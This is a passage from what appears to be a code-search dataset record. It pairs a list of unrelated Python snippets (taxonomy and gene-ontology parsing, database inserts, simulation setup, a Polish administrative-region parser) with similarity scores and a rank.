open(self.tmp_fp1).read()\r\n exp = '\\n'.join(['#sample_id\\tfoo\\tbar\\ta;b;c\\td;e;f',\r\n 
's1\\tsomething1\\tsomething2\\t1\\t2',\r\n 's2\\tsomething3\\tsomething4\\t3\\t4\\n'])\r\n self.assertEqual(obs, exp)\r\n self.files_to_remove.append(self.tmp_fp1)", "def AddTreeTerm(con, cur, termid, parentid, ontologynameid, commit=True):\n try:\n # test if already exists\n cur.execute('SELECT uniqueId FROM OntologyTreeStructureTable WHERE (ontologyId=%s AND ontologyParentId=%s AND ontologyNameId=%s) LIMIT 1', [termid, parentid, ontologynameid])\n if cur.rowcount > 0:\n sid = cur.fetchone()[0]\n debug(2, 'Tree entry exists (%d). returning it' % sid)\n return '', sid\n # does not exist - lets add it\n cur.execute('INSERT INTO OntologyTreeStructureTable (ontologyId,ontologyParentId,ontologyNameId) VALUES (%s,%s,%s) RETURNING uniqueId', [termid, parentid, ontologynameid])\n sid = cur.fetchone()[0]\n return '', sid\n except psycopg2.DatabaseError as e:\n debug(7, \"error %s enountered in ontology.AddTreeTerm\" % e)\n return \"error %s enountered in ontology.AddTreeTerm\" % e, -2", "def setup_openpmd_species_record( self, grp, quantity ):\n # Generic setup\n self.setup_openpmd_record( grp, quantity )\n\n # Weighting information\n grp.attrs[\"macroWeighted\"] = macro_weighted_dict[quantity]\n grp.attrs[\"weightingPower\"] = weighting_power_dict[quantity]", "def get_taxa(self, **kwargs):\n if \"oids\" not in kwargs and \"labels\" not in kwargs:\n raise TypeError(\"Need to specify taxa oid's or labels\")\n oids = kwargs.get(\"oids\", [])\n labels = kwargs.get(\"labels\", [])\n taxa = []\n for oid in oids:\n t = self.get_taxon(oid=oid)\n if t:\n taxa.append(t)\n for label in labels:\n t = self.get_taxon(label=label)\n if t:\n taxa.append(t)\n return taxa", "def test_make_new_species(self):\n\n # adding 3 unique species:\n cerm = CoreEdgeReactionModel()\n\n spcs = [Species().from_smiles('[OH]'),\n Species().from_smiles('CC'),\n Species().from_smiles('[CH3]')]\n\n for spc in spcs:\n cerm.make_new_species(spc)\n\n self.assertEquals(len(cerm.species_dict), len(spcs))\n self.assertEquals(len(cerm.index_species_dict), len(spcs))\n\n # adding 3 unique, and 1 already existing species:\n cerm = CoreEdgeReactionModel()\n\n spcs = [Species().from_smiles('[OH]'),\n Species().from_smiles('CC'),\n Species().from_smiles('[CH3]'),\n Species().from_smiles('CC')] # duplicate species\n\n for spc in spcs:\n cerm.make_new_species(spc)\n\n self.assertEquals(len(cerm.species_dict), len(spcs) - 1)\n self.assertEquals(len(cerm.index_species_dict), len(spcs) - 1)", "def new_taxon_set(ntax=10, label_func=None):\n taxon_set = TaxonSet()\n if label_func is None:\n label_idx_length = int(math.log(ntax, 10)) + 1\n label_template = \"T%%0%dd\" % (label_idx_length)\n label_func = lambda x: label_template % x\n for i in range(ntax):\n taxon_set.new_taxon(label=label_func(i+1))\n return taxon_set", "def createSpeciesType(self):\n return _libsbml.Model_createSpeciesType(self)", "def _init_dictionaries(self):\n\t\t# Dictionary contatining all actionPotential\n\t\tself.actionPotentials = {}\n\t\t# Dictionary containing all cells id.\n\t\t# Cells id are used by neuron to communicate synapses between different cells in different hosts. 
Ids (gids) can be any integer, they just need to be unique.\n\t\tself.cellsId = {}\n\t\t# Dictionary containing all cells\n\t\tself.cells = {}\n\n\t\tself._nMuscles = len(self._infoMuscles)\n\t\tfor muscle,muscAfferentDelay in self._infoMuscles:\n\t\t\t# Create sub-dictionaries for all DoF\n\t\t\tself.actionPotentials[muscle]={}\n\t\t\tself.cellsId[muscle]={}\n\t\t\tself.cells[muscle]={}\n\t\t\tfor cellInfo in self._infoCommonCellsInMuscles:\n\t\t\t\t# add lists containing cell ids/cells/ap\n\t\t\t\tcellClass = cellInfo[0]\n\t\t\t\tcellName = cellInfo[1]\n\t\t\t\tself.cellsId[muscle][cellName]=[]\n\t\t\t\tself.cells[muscle][cellName]=[]\n\t\t\t\tif (cellClass==\"Motoneuron\" or cellClass==\"IntFireMn\") and self.recordMotoneurons:\n\t\t\t\t\tself.actionPotentials[muscle][cellName]=[]\n\t\t\t\telif cellClass==\"AfferentFiber\" and self.recordAfferents:\n\t\t\t\t\tself.actionPotentials[muscle][cellName]=[]\n\t\t\t\telif cellClass==\"IntFire\" and self.recordIntFire:\n\t\t\t\t\tself.actionPotentials[muscle][cellName]=[]\n\n\t\t# Add special cells (specifc for some muscles or not muscle related)\n\t\tfor cellInfo in self._infoSpecialCells:\n\t\t\tgroupOrMuscle = cellInfo[0]\n\t\t\tcellClass = cellInfo[1]\n\t\t\tcellName = cellInfo[2]\n\t\t\tif not groupOrMuscle in self.cellsId.keys():\n\t\t\t\tself.actionPotentials[groupOrMuscle]={}\n\t\t\t\tself.cellsId[groupOrMuscle]={}\n\t\t\t\tself.cells[groupOrMuscle]={}\n\n\t\t\tself.cellsId[groupOrMuscle][cellName]=[]\n\t\t\tself.cells[groupOrMuscle][cellName]=[]\n\t\t\tif (cellClass==\"Motoneuron\" or cellClass==\"IntFireMn\") and self.recordMotoneurons:\n\t\t\t\tself.actionPotentials[groupOrMuscle][cellName]=[]\n\t\t\telif cellClass==\"AfferentFiber\" and self.recordAfferents:\n\t\t\t\tself.actionPotentials[groupOrMuscle][cellName]=[]\n\t\t\telif cellClass==\"IntFire\" and self.recordIntFire:\n\t\t\t\tself.actionPotentials[groupOrMuscle][cellName]=[]", "def create_objects(cls, table):\n x = 2\n state = State(table[1][4])\n while x < len(table):\n line = table[x]\n if line[5] == \"powiat\" or line[5] == \"miasto na prawach powiatu\":\n county = County(line[4], line[1])\n state.in_state(county)\n elif line[5] == \"miasto\":\n city = City(line[4], line[1], line[2])\n state.in_state(city)\n elif line[5] == \"gmina miejska\":\n city_community = City_Community(line[4], line[1], line[2])\n state.in_state(city_community)\n elif line[5] == \"gmina wiejska\":\n village_community = Village_Community(line[4], line[1], line[2])\n state.in_state(village_community)\n elif line[5] == \"gmina miejsko-wiejska\":\n city_village_community = City_Village_Community(line[4], line[1], line[2])\n state.in_state(city_village_community)\n elif line[5] == \"obszar wiejski\":\n village_square = Village_square(line[4], line[1], line[2])\n state.in_state(village_square)\n elif line[5] == \"delegatura\":\n delagacy = Delegacy(line[4], line[1], line[2])\n state.in_state(delagacy)\n x+=1\n\n for county in state.in_s:#adding community objects to a proper county\n if type(county) == County:\n for community in state.in_s:\n if community.county_number == county.county_number and type(community) != County:\n county.in_county(community)\n\n return state", "def generate_armour_type_dicts(armour_types_dict: dict):\n troops_to_armour_types_dict = {}\n\n for armour_type, troops in armour_types_dict.items():\n for troop in troops:\n if troop not in troops_to_armour_types_dict:\n troops_to_armour_types_dict[troop] = armour_type\n joint_dict = {\"armourTypeToTroops\": armour_types_dict,\n 
\"troopsToArmourType\": troops_to_armour_types_dict}\n return joint_dict", "def parse_taxonomy_to_otu_metadata(\r\n lines, labels=['taxonomy', 'score'], process_fs=[taxa_split, float]):\r\n result = {}\r\n\r\n for line in lines:\r\n line = line.strip()\r\n fields = line.split('\\t')\r\n id_ = fields[0].split()[0]\r\n result[id_] = {}\r\n for i, field in enumerate(fields[1:]):\r\n try:\r\n label = labels[i]\r\n except IndexError:\r\n continue\r\n try:\r\n value = process_fs[i](field)\r\n except IndexError:\r\n raise ValueError(\r\n \"Too few process functions provided (n=%d).\" %\r\n len(process_fs))\r\n result[id_][label] = value\r\n return result", "def table_with_routes(df, routes):\n full_names = []\n high_tax_list = []\n low_tax_list = []\n for org in in_taxa_dict.keys():\n group, subtax, long_name = in_taxa_dict[org]\n high_tax_list.append(group)\n low_tax_list.append(subtax)\n full_names.append(long_name)\n\n df = df[df.index.isin(in_taxa_dict.keys())]\n no_seqs = set(in_taxa_dict.keys()) - set(df.index)\n\n for taxon in no_seqs:\n df.loc[taxon] = len(df.columns) * [0]\n\n df.index.name = 'Unique ID'\n df.insert(loc=0, column='Lower Taxonomy', value=low_tax_list)\n df.insert(loc=0, column='Higher Taxonomy', value=high_tax_list)\n df.insert(loc=0, column='Full Name', value=full_names)\n\n df = df.sort_index(axis=0)\n df.to_csv(f'{output_fold}/occupancy.tsv', sep='\\t')\n\n # Adds routes to df\n for gene in df.columns:\n df[gene] = df[gene].apply(str)\n for org in df[gene].index:\n if org in routes[gene]:\n df.at[org, gene] = f'{df[gene][org]}_{routes[gene][org]}'\n\n df.to_csv(f'{output_fold}/occupancy_with_routes.tsv', sep='\\t')\n\n return df", "def taxon_children(self, taxonomy):\n\n taxon_children = defaultdict(set)\n for taxon_id, taxa in taxonomy.items():\n for i, taxon in enumerate(taxa):\n if len(taxon) == 3:\n continue # just rank prefix\n\n if len(taxa) > i + 1 and len(taxa[i + 1]) != 3:\n taxon_children[taxon].add(taxa[i + 1])\n\n if len(taxa) > self.rank_index['s__']:\n taxon = taxa[self.rank_index['s__']]\n if taxon != 's__':\n taxon_children[taxon].add(taxon_id)\n\n return taxon_children", "def __init__(self, filename):\n\n self.term_dict = {}\n for line in open(filename):\n if line.startswith(\"#\"):\n continue\n\n #print line\n word, w_type = line.strip().split(\"\\t\")\n self.term_dict[word.strip().lower()] = \"CHESS_\" + w_type.strip().lower()", "def createtown_random(self):\n town = m.Town()\n town.name = town.name + str(len(self.alltowns))\n self.print_mainlog(\n \"A new town, %s, appeared at %d,%d!\" %\n (town.name, town.pos.x, town.pos.y)\n )\n self.alltowns.append(town)", "def valueCountsSpecies(newDF, l, tax):\n df = newDF[newDF.index.isin(l)]\n df.loc[\"Total\"] = df.sum()\n vals = {}\n totalNum = 0\n for i in range(len(df.loc[\"Total\"])):\n if df.loc[\"Total\"][i] > 0:\n spec = df.columns[i]\n spec = spec.replace(\"_\", \" \")\n if spec in tax: \n try: \n phylum = tax[spec][\"phylum\"]\n except:\n continue\n #print(spec, tax[spec])\n #print(spec, phylum)\n if phylum in vals: \n vals[phylum] += 1\n else:\n vals[phylum] = 1\n totalNum += 1\n totalVals = {}\n otherVal = 0\n otherMakeup = []\n for key in vals.copy():\n percentage = 100*(float(vals[key]) / float(totalNum))\n if percentage <= 2.0:\n otherVal += vals[key]\n otherMakeup.append(key)\n vals.pop(key, None)\n totalVals[key] = percentage\n vals[\"Other\"] = otherVal\n \n return vals, otherMakeup, totalVals", "def parse_etymology() -> Dict[str, str]:\n with open(PATH_ETYMOLOGY, encoding=\"utf-8\") as 
f:\n\n buffer = defaultdict(list)\n for line in f:\n line = line.strip()\n\n # Skip empty lines\n if not line:\n continue\n\n # New block\n if line[1] == \" \" and line[2] == \"(\":\n hanzi = line[0]\n else:\n buffer[hanzi].append(line)\n\n result = {}\n for k,v in buffer.items():\n result[k] = \" \".join(v)\n\n return result", "def get_observable(stix_obj, log):\n res_obj = {}\n\n if stix_obj[u\"type\"] == \"relationship\":\n return None\n\n res_obj[u\"toxicity\"] = stix_obj.get(IBM_TOXICITY, \"\")\n res_obj[u\"relevance\"] = stix_obj.get(IBM_RELEVANCE, \"\")\n res_obj[u\"description\"] = get_observable_description(stix_obj, log)\n res_obj[u\"type\"] = get_observable_type(stix_obj, log)\n\n return res_obj", "def __getGeneOntologyChainMapping(self, siftsSummaryDirPath, csvFileName):\n fp = os.path.join(siftsSummaryDirPath, csvFileName)\n rowDL = self.__readSiftsSummaryFile(fp)\n logger.info(\"Length of SIFTS summary file %s %d\", csvFileName, len(rowDL))\n logger.debug(\"CSV keys: %r\", list(rowDL[0].items()))\n tD = {}\n for rowD in rowDL:\n entryId = rowD[\"PDB\"]\n chainId = rowD[\"CHAIN\"]\n prov = rowD[\"SP_PRIMARY\"]\n evidenceCode = rowD[\"EVIDENCE\"]\n goId = rowD[\"GO_ID\"]\n dD = {\"GO_ID\": goId, \"EV\": evidenceCode, \"PROV\": prov}\n tD.setdefault(entryId.upper(), {}).setdefault(chainId, []).append(dD)\n logger.info(\"GO data for %d entries\", len(tD))\n return tD", "def extant_taxa(self, taxonomy):\n\n extant_taxa = {}\n for rank_label in Taxonomy.rank_labels:\n extant_taxa.update(self.extant_taxa_for_rank(rank_label, taxonomy))\n\n return extant_taxa", "def make_envs_dict(abund_mtx, sample_names, taxon_names):\r\n num_samples, num_seqs = abund_mtx.shape\r\n if (num_samples, num_seqs) != (len(sample_names), len(taxon_names)):\r\n raise ValueError(\r\n \"Shape of matrix %s doesn't match # samples and # taxa (%s and %s)\" %\r\n (abund_mtx.shape, num_samples, num_seqs))\r\n envs_dict = {}\r\n sample_names = asarray(sample_names)\r\n for i, taxon in enumerate(abund_mtx.T):\r\n\r\n nonzeros = taxon.nonzero() # this removes zero values to reduce memory\r\n envs_dict[taxon_names[i]] = dict(zip(sample_names[nonzeros],\r\n taxon[nonzeros]))\r\n return envs_dict", "def get_locus_by_taxon(id): # noqa: E501\n return 'do some magic!'", "def loadCity(fileid):\n dinf = {}\n root = etree.Element(\"city\")\n text = None\n statename = \"\"\n statefile = \"\"\n cityname = \"\"\n dinf['m'] = {}\n dinf['m']['events'] = {}\n # TODO: put this in a global variable, and make a function to populate it from the DTD.\n tags = [\"name\",\"state\",\"statefile\",\"start\",\"scue\",\"end\",\"ecue\",\"place\",\"aspects\"]\n for tag in tags:\n dinf[tag] = [\"\",False]\n dinf['aspects'] = {}\n if not dinf.get(\"places\"): dinf['places'] = {}\n if not idExists(fileid):\n status.push(0,\"new city created... '%s'\" % fileid)\n return dinf\n fn = os.path.join(config['realmdir'],\"%s.xml\" % fileid)\n status.push(0,\"loading city from XML... 
'%s'\" % fn)\n try:\n with codecs.open(fn,'rU','utf-8') as f:\n tree = etree.parse(f)\n f.close()\n root = tree.getroot()\n except IOError as e:\n print \"c: Could not open configuration file: %s\" % e\n\n ir = 0\n for i in range(len(root)):\n if root[i].tag is not None:\n if root[i].tag == \"place\":\n if len(root[i]) > 0:\n node = \"\"\n node = root[i].find(\"file\")\n if node.text:\n node = node.text.strip()\n node = common.validateFileid(node)\n dinf['places'][node] = {}\n for j in root[i]:\n if j.tag and j.text and j.tag != \"file\":\n dinf['places'][node][j.tag] = [j.text.strip(),False]\n if config['debug'] > 3: print dinf['places'][node]\n else:\n if config['debug'] > 0:\n print \"Invalid place tag:\"\n for c in root[i]:\n print c.tag + ': ' + c.text,\n else: # no relat length\n if config['debug'] > 0: print \"Empty place tag.\"\n elif root[i].tag == \"events\":\n if len(root[i]) > 0:\n nodes = root[i]\n for node in nodes:\n k = str(len(dinf['m']['events']))\n dinf['m']['events'][k] = {}\n for j in node:\n if j.tag and j.text:\n dinf['m']['events'][k][j.tag] = [j.text.strip(),False]\n else:\n if config['debug'] > 0:\n print \"Invalid milestone tag:\"\n for c in node:\n print c.tag + ': ' + c.text,\n if config['debug'] > 3: printPretty(dinf['m']['events'])\n else: # no relat length\n if config['debug'] > 0: print \"Empty milestone tag.\"\n elif root[i].tag == \"aspects\":\n if len(root[i]) > 0:\n nodes = root[i]\n for node in nodes:\n k = str(len(dinf['aspects']))\n dinf['aspects'][k] = {}\n if node.tag and node.text:\n dinf['aspects'][k] = [node.text.strip(),False]\n else:\n if config['debug'] > 0:\n print \"Invalid aspects tag:\"\n print node.tag + ': ' + node.text,\n else: # no aspects length\n if config['debug'] > 0: print \"Empty aspects tag.\"\n elif root[i].text is not None:\n if root[i].tag == \"statefile\":\n statefile = root[i].text.strip()\n statefile = common.validateFileid(statefile)\n if statefile is None: statefile = \"\"\n elif root[i].tag == \"state\":\n statename = root[i].text.strip()\n elif root[i].tag == \"name\":\n cityname = root[i].text.strip()\n dinf[root[i].tag] = [root[i].text.strip(), False]\n if config['debug'] > 2: print str(i) + \" \",\n if len(statefile) > 0: pushLoc(statefile,statename,fileid,cityname)\n return dinf", "def animals_by_species(self):\n print self.animal()", "def _get_all_oshapes(self):\n iseq_name = self.node_list[0]\n iseq = self.builder.nodes[iseq_name]\n iseq_mainshape = iseq.oshapes['main']\n \n return {'main' : iseq_mainshape,\n 'loc' : iseq_mainshape,\n 'invscaled' : iseq_mainshape + [iseq_mainshape[-1]],\n 'invscaleoffd' : iseq_mainshape + [iseq_mainshape[-1]]}" ]
[ "0.62028277", "0.5643144", "0.55928254", "0.5586047", "0.5550129", "0.5545237", "0.55178034", "0.54141647", "0.5405542", "0.5331211", "0.528797", "0.52788687", "0.5253945", "0.52389264", "0.5223071", "0.52124864", "0.516965", "0.51686347", "0.51635945", "0.49660262", "0.49572685", "0.49468812", "0.4933717", "0.49297443", "0.49112213", "0.49094617", "0.48972872", "0.4891772", "0.48882136", "0.48873076", "0.48791263", "0.4875703", "0.48654377", "0.48565212", "0.48425257", "0.48131967", "0.4793532", "0.47880322", "0.47878018", "0.4787729", "0.47716266", "0.47637832", "0.47580788", "0.47534636", "0.47498828", "0.47481045", "0.47412547", "0.47397614", "0.4724246", "0.47240007", "0.47238767", "0.4721686", "0.47147682", "0.47056356", "0.4678703", "0.46618032", "0.4659743", "0.4655493", "0.46381202", "0.46321014", "0.46262538", "0.4625299", "0.4619253", "0.46122545", "0.46096027", "0.46082482", "0.4602801", "0.45992818", "0.45929617", "0.45825246", "0.4580829", "0.45630735", "0.45586604", "0.45548093", "0.4554265", "0.45526564", "0.45396143", "0.45308253", "0.4523525", "0.45225468", "0.4520045", "0.45100617", "0.45026943", "0.45004636", "0.45004556", "0.44995746", "0.44947657", "0.44899726", "0.44796985", "0.44737962", "0.4468629", "0.44677818", "0.44670567", "0.44652238", "0.44603136", "0.44418114", "0.44413173", "0.44409233", "0.44349682", "0.44342393" ]
0.6710074
0
add an entry in the dic with key "human gene ID" and value "ortholog gene ID"
def add_gene(self, human_gene, ortholog):
    if human_gene not in self.genes:
        self.genes[human_gene] = list()
    self.genes[human_gene].append(ortholog)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def update_gene_info(ensembl_info, word, value):\n if \"gene\" in word:\n if \"id\" in word:\n ensembl_info[\"ensembl_gene_id\"] = value\n elif \"start\" in word:\n ensembl_info[\"gene_start\"] = int(value)\n elif \"end\" in word:\n ensembl_info[\"gene_end\"] = int(value)\n return ensembl_info", "def _add_chebi_identifiers(map_dict) -> dict:\n sys.stdout.write(\"Adding ChEBI identifiers...\\n\")\n all_chebi = [k for k in map_dict if k.lower().startswith('chebi')]\n\n ch = ChEBI()\n\n for chebi_id in tqdm.tqdm(all_chebi, total=len(all_chebi)):\n uid = chebi_id.split(':')[-1]\n\n try:\n # query ChEBI API\n result = ch.getCompleteEntity(uid)\n except Exception as x:\n print(\"%s: %s\" % (chebi_id, x.__class__.__name__))\n continue\n\n to_add = []\n\n if hasattr(result, 'SecondaryChEBIIds'):\n to_add += [str(s) for s in result.SecondaryChEBIIds]\n\n if hasattr(result, 'OntologyChildren'):\n to_add += [str(ent.chebiId) for ent in result.OntologyChildren\n if ent.type in ('is conjugate acid of',\n 'is conjugate base of',\n 'is tautomer of')]\n\n if hasattr(result, 'OntologyParents'):\n to_add += [str(ent.chebiId) for ent in result.OntologyParents\n if ent.type in ('is conjugate acid of',\n 'is conjugate base of',\n 'is tautomer of')]\n\n for ent_id in to_add:\n new_id = '{}:{}'.format('ChEBI', ent_id.split(':')[-1])\n map_dict[chebi_id].add(new_id)\n\n return map_dict", "def _get_gene_map(self) -> OrderedDict:\n if \"gene\" not in self.data:\n return OrderedDict()\n\n genes: OrderedDict = OrderedDict()\n for idx, genestr in self.data[\"gene\"].items():\n if pd.isnull(genestr):\n continue\n for gene in genestr.split(\",\"):\n if gene not in genes:\n genes[gene] = []\n genes[gene].append(idx)\n return genes", "def get_gene_id_dict(list_of_results):\n dict1 = {}\n for i, dict2 in enumerate(list_of_results):\n key = dict2[\"GeneID\"]\n if key in dict1.keys():\n # list1 = dict1[key]\n # list1.append(list_of_results[i])\n # dict1[key] = list1\n # list1.append(list_of_results[i])\n dict1[key].append(list_of_results[i])\n else:\n dict1[key] = [list_of_results[i]]\n return dict1", "def addDic(dic, elt):\n pass", "def test_addDict(self):\n lidi = []\n lidi.append({'term': 'foo', 'tags': 'a', 'value': '1'})\n lidi.append({'term': 'bar', 'tags': 'a, b', 'value': '2'})\n lidi.append({'term': 'gnark', 'tags': 'a, c', 'value': '3'})\n self.g.add_dict(lidi)", "def addToHistogram(s,d):\n\n if s in d:\n #if the character is in the dictionary, the amount of that character record increases \n d[s] += 1\n else:\n #if not in the dictionary, a new key & value will be made\n d[s] =1\n\n #lastly returns the dictionary itself \n return d", "def set_dict(self, lines):\n for line in lines:\n line = line.rstrip()\n split_line = line.split(\"\\t\")\n old_gene_id = split_line[0]\n new_gene_id = split_line[2]\n conv_dict = self.conversion_dict\n conv_dict[old_gene_id] = new_gene_id\n self.conversion_dict = conv_dict", "def gene_ID_wrangler(inpAcc):\n \n print(\"processing gene symbols\")\n \n resD = {}\n \n for convI in inpAcc:\n keyI = convI[\"InputValue\"]\n valueI = convI[\"Gene ID\"]\n resD[keyI] = valueI\n\n return resD", "def _add_uniprot_identifiers(map_dict) -> dict:\n sys.stdout.write(\"Adding UniProt identifiers...\\n\")\n r_session = base_utils.requests_retry_session()\n all_uniprot = [k for k in map_dict if k.lower().startswith('uniprot')]\n\n for uniprot_id in tqdm.tqdm(all_uniprot, total=len(all_uniprot)):\n db, uid = uniprot_id.split(':')\n\n try:\n # query UniProt API\n r = r_session.get(\n 
'http://www.uniprot.org/uniprot/' + uid + '.xml'\n )\n except Exception as x:\n print(\"%s: %s\" % (uniprot_id, x.__class__.__name__))\n continue\n\n if r.content:\n root = etree.fromstring(r.content)\n if root:\n for s in root[0]:\n if s.tag.endswith('accession'):\n new_id = '{}:{}'.format('UniProt', s.text.split(':')[-1])\n map_dict[uniprot_id].add(new_id)\n else:\n break\n\n return map_dict", "def build_gene_indexes(df):\n\tgeneDict = OrderedDict()\n\n\tgeneCount = 0\n\tpreviousGeneIndex = 0\n\n\tcurrent_id=\"\"\n\tcurrent_gene=\"\"\n\n\tfor i in range(len(df)):\n\n\t\tif df.loc[i,'feature'] == 'gene':\n\t\t\ttrdict = parse_entry(df.loc[i,'transcript_id'])\n\n\t\t\tcurGeneID = trdict['gene_id'][0]\n\t\t\n\t\t\tif geneCount != 0:\n\t\t\t\tnewGeneIndex = i\n\t\t\t\tgeneDict[current_id] = [previousGeneIndex,newGeneIndex]\n\t\t\t\tpreviousGeneIndex = i\n\t\t\t\tcurrent_id = trdict['gene_id'][0]\n\t\t\t\tgeneCount += 1\n\n\t\t\telse:\n\t\t\t\tnewgeneIndex = 0\n\t\t\t\tgeneCount +=1\n\t\t\t\tcurrent_id = trdict['gene_id'][0]\n\t\tif i == (len(df)-1):\n\t\t\tnewGeneIndex = i+1\n\t\t\tcurrent_id = trdict['gene_id'][0]\n\t\t\tgeneDict[current_id] = [previousGeneIndex,newGeneIndex]\n\treturn geneDict", "def init_gene():\n gene_details=dict(\n id = '', \n anno_id = [],\n confgenes_id = [],\n name = '',\n source = '',\n gene_info = {},\n alias = '',\n name2 = [],\n strand = '',\n chr = '',\n chr_num = [],\n paralogs = [],\n start = '',\n stop = '',\n transcripts = [],\n transcript_info = [],\n transcript_status = [],\n transcript_valid = [],\n exons = [],\n exons_confirmed = [],\n cds_exons = [],\n utr5_exons = [],\n utr3_exons = [],\n tis = [],\n tis_conf = [],\n tis_info = [],\n cdsStop = [],\n cdsStop_conf = [],\n cdsStop_info = [],\n tss = [],\n tss_info = [],\n tss_conf = [],\n cleave = [],\n cleave_info = [],\n cleave_conf = [],\n polya = [],\n polya_info = [],\n polya_conf = [],\n is_alt = [],\n is_alt_spliced = 0,\n is_valid = [],\n transcript_complete = [],\n is_complete = [],\n is_correctly_gff3_referenced = '',\n splicegraph = []\n )\n return gene_details", "def _add_item(dic: dict, keys: list, value):\n\tfor key in keys[:-1]:\n\t\tdic = dic.setdefault(key, {})\n\n\tdic[keys[-1]] = value", "def createIndivitual(self) -> Dict[str, Any]:\n ind = {\n \"genome\": {\n key: numpy.random.randint(0, len(value), size=self.ref_count[key]) for (\n key, value) in self.grammar.items()\n },\n \"fitness\": None,\n \"fenotype\": None,\n }\n return ind", "def add(self, key, value):", "def anno_gene_stats(anno_gene, loc_file, gene_file, isConvert):\r\n LocationNum = collections.Counter()\r\n LocationGene = collections.defaultdict(list)\r\n\r\n\r\n GeneCatSample = collections.defaultdict(lambda: collections.defaultdict(list))\r\n CatGeneSample = collections.defaultdict(lambda: collections.defaultdict(list))\r\n\r\n allLocations = set()\r\n anno_h = open(anno_gene, \"r\")\r\n for line in anno_h:\r\n lines = line.strip().split(\"\\t\")\r\n sample, location, number, gene = lines[:4]\r\n number = int(number)\r\n\r\n ### whether convert the category to \"Exon\" or \"Intron\"\r\n if isConvert == \"True\":\r\n if location == \"Intron\":\r\n newLoc = \"Intron\"\r\n else:\r\n newLoc = \"Exon\"\r\n elif isConvert == \"False\":\r\n newLoc = location\r\n else:\r\n print(\"Please check whether convert the original category to 'Intron' or 'Exon' based on True of False.\")\r\n sys.exit(1)\r\n\r\n allLocations.add(newLoc)\r\n ### get the dict of gene -> location -> sample\r\n genes = gene.split(\",\")\r\n for g in 
genes:\r\n GeneCatSample[g][newLoc].append(sample)\r\n\r\n ### get the location -> gene -> sample\r\n CatGeneSample[newLoc][g].append(sample)\r\n anno_h.close()\r\n\r\n\r\n ## output gene and number in samples\r\n ### sort all locations\r\n sortedAllLocation = sorted(list(allLocations))\r\n\r\n gene_h = open(gene_file, \"w\")\r\n\r\n headerSample = [l + \"_samples\" for l in sortedAllLocation]\r\n gene_h.write(\"Gene\\tTotal\\t%s\\t%s\\n\" % (\"\\t\".join(sortedAllLocation), \"\\t\".join(headerSample)))\r\n\r\n GeneRecord = {}\r\n GeneNumber = {}\r\n\r\n allGenes = sorted(list(GeneCatSample.keys()))\r\n for ge in allGenes:\r\n ### get the number and samples for each location of each gene\r\n GeneNum = []\r\n GeneSample = []\r\n\r\n for loc in sortedAllLocation:\r\n if loc in GeneCatSample[ge]:\r\n samples = GeneCatSample[ge][loc]\r\n ##############################\r\n ####### unique for samples\r\n samples = sorted(list(set(samples)))\r\n sampleNum = len(samples)\r\n else:\r\n sampleNum = 0\r\n samples = [\"-\"]\r\n\r\n GeneNum.append(sampleNum)\r\n GeneSample.append(samples)\r\n\r\n GeneNumSum = sum(GeneNum)\r\n CatNumOut = \"\\t\".join([str(g) for g in GeneNum])\r\n CatSampleOut = \"\\t\".join([\",\".join(s) for s in GeneSample])\r\n\r\n record = \"%s\\t%d\\t%s\\t%s\\t\" % (ge, GeneNumSum, CatNumOut, CatSampleOut)\r\n GeneNumber[ge] = GeneNumSum\r\n GeneRecord[ge] = record\r\n \r\n ### output\r\n GeneNumSorted = sort_dict_value(GeneNumber)\r\n for g, n in GeneNumSorted:\r\n r = GeneRecord[g]\r\n gene_h.write(\"%s\\n\" % r)\r\n\r\n gene_h.close() \r\n\r\n\r\n ### location and genes\r\n loc_h = open(loc_file, \"w\")\r\n loc_h.write(\"Location\\tGeneNumber\\tGenes\\tSampleNumber\\tSamples\\n\")\r\n for loc in sortedAllLocation:\r\n geneSample = CatGeneSample[loc]\r\n genes = sorted(list(geneSample.keys()))\r\n geneNum = len(genes)\r\n samNum = 0\r\n samList = []\r\n for ge in geneSample:\r\n sam = geneSample[ge]\r\n samList.append(sam)\r\n samNum += len(sam)\r\n samOut = \";\".join([\",\".join(s) for s in samList])\r\n loc_h.write(\"%s\\t%d\\t%s\\t%d\\t%s\\n\" % (loc, geneNum, \",\".join(genes), samNum, samOut))\r\n loc_h.close()", "def add_protogene(self, protogene):\n if protogene.name:\n name = protogene.name\n else:\n name = str(self.num_protogenes())\n self.protogenes[name] = protogene", "def write_concat_GO_dicts(self, *GO_dict):\n\n for i, j in zip(self.IDs[0:3], GO_dict):\n with open(i, 'w') as f:\n f.write('transcript_id\\tgene_ontology\\n')\n for k, v in j.iteritems():\n f.write(k + '\\t' + '\\t'.join(v) + '\\n')", "def gencode_dic(gencode_file,gene_type_dic):\n gen_dic = {}\n for i in range(1,len(gencode_file)):\n words_gen = gencode_file[i].strip().split('\\t')\n chr_no = words_gen[2]\n trans_id = words_gen[1]\n cds_info = words_gen[13]\n cde_info = words_gen[14]\n gene_type = gene_type_dic[trans_id]\n gene_name = words_gen[12]\n TSS_start = int(words_gen[4])\n TSS_end = int(words_gen[5])\n CDS_start = int(words_gen[6])\n CDS_end = int(words_gen[7])\n strand = words_gen[3]\n start_list = [int(x) for x in words_gen[9].split(',')[:-1]]\n end_list = [int(x) for x in words_gen[10].split(',')[:-1]]\n exon_no = int(words_gen[8])\n# if (chr_no,trans_id) in gen_dic: #Some trans_id are not unique, especially transcripts in chrX and chrY\n# print trans_id\n interval_list = [P.closedopen(start_list[x],end_list[x]) for x in range(0,exon_no)]\n interval_merge = P.empty()\n for i in range(0,len(interval_list)):\n interval_merge = interval_merge | interval_list[i]\n if gene_type == 
'protein_coding':\n if (cds_info == 'cmpl') and (cde_info == 'cmpl'):\n # print (interval_merge)\n gen_dic.setdefault((chr_no,strand),[]).append([TSS_start,TSS_end,CDS_start,CDS_end,\\\n gene_name,gene_type,interval_merge])\n else:\n gen_dic.setdefault((chr_no,strand),[]).append([TSS_start,TSS_end,CDS_start,CDS_end,\\\n gene_name,gene_type,interval_merge])\n return gen_dic", "def add(self, val: dict):\n keys = self.header or val.keys()\n vals = tuple(val.get(k) for k in keys)\n self[vals] += 1", "def process_gene_line(self, line):\n kwargs = self.extract_gene_args(line)\n if not kwargs:\n return\n gene_id = kwargs['identifier']\n self.genes[gene_id] = Gene(**kwargs)", "def _addCounterToMap(probeMap, counter, index):\n if counter.probe in probeMap:\n probeMap[counter.probe].append(index)\n else:\n probeMap.update({counter.probe : [index]})", "def internal_id_append(json_keys, json):\n candidate_id = 0\n for name in list(json_keys):\n json[name]['internal_id'] = candidate_id\n candidate_id += 1\n return json", "def 